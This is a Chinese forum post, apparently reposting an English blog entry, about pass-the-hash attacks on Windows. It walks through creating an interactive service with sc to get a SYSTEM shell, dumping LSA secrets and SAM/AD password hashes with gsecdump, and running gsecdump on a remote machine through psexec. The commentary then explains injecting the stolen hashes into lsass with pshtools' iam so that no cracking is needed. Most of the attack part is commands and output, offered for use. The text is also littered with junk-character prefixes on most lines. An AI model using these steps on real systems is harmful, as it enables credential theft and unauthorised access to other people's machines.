HASH注入式攻击

admin

o get a DOS Prompt as NT system:
( L/ F& X; k, _% T8 U! o0 h$ J
+ u9 y/ g, w2 R* G* {+ C  XC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
/ s( R( M; f. _% c. }) c5 Z[SC] CreateService SUCCESS
& x' x4 F& U$ m' D7 ^, W
C:\>sc start shellcmdline
8 M* r! b# C3 u$ q9 j6 H$ W[SC] StartService FAILED 1053:
2 C. Q8 ~/ P$ N
; T& t) a( {5 I+ C9 W6 C- PThe service did not respond to the start or control request in a timely fashion.
" Z  h! {6 m0 k1 `5 T2 B. N
& }/ n2 W; B. n1 G* g' J# W- c8 s9 oC:\>sc delete shellcmdline
0 v. h2 H* m, }, X1 E[SC] DeleteService SUCCESS
) R; F: ^, F! E& B: z
, R& |9 v1 g3 c. G------------

Then in the new DOS window:

5 ^, T4 o1 M  ~) m" @9 zMicrosoft Windows XP [Version 5.1.2600]
4 |  `7 g5 z! U(C) Copyright 1985-2001 Microsoft Corp.

5 X9 G4 J) P0 d) b3 }C:\WINDOWS\system32>whoami
2 H) V; K8 k) Y" M7 xNT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
9 P! H! c/ O* M' Ugsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
usage: gsecdump [options]
! N7 o' ~; M+ E! N' P) C' n
options:
" z7 P" g8 v0 s; e) _-h [ --help ] show help
-a [ --dump_all ] dump all secrets
' l, ]* N* N- s0 {; S9 t3 P-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
8 P; c8 C5 Z2 J. y-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:
; S9 Q& e; |. Z% t1 K. M
PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
2 ~& x  }$ H2 W, o  C# Z4 P- JSysinternals - 链接标记[url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
: f5 m7 {3 P$ E8 `5 f+ d3 Z/ y
to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

& |  F, q7 k  \9 s# [4 c- p提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

我看了下原文出处，貌似是/2007/03/16/郁闷啊，差距。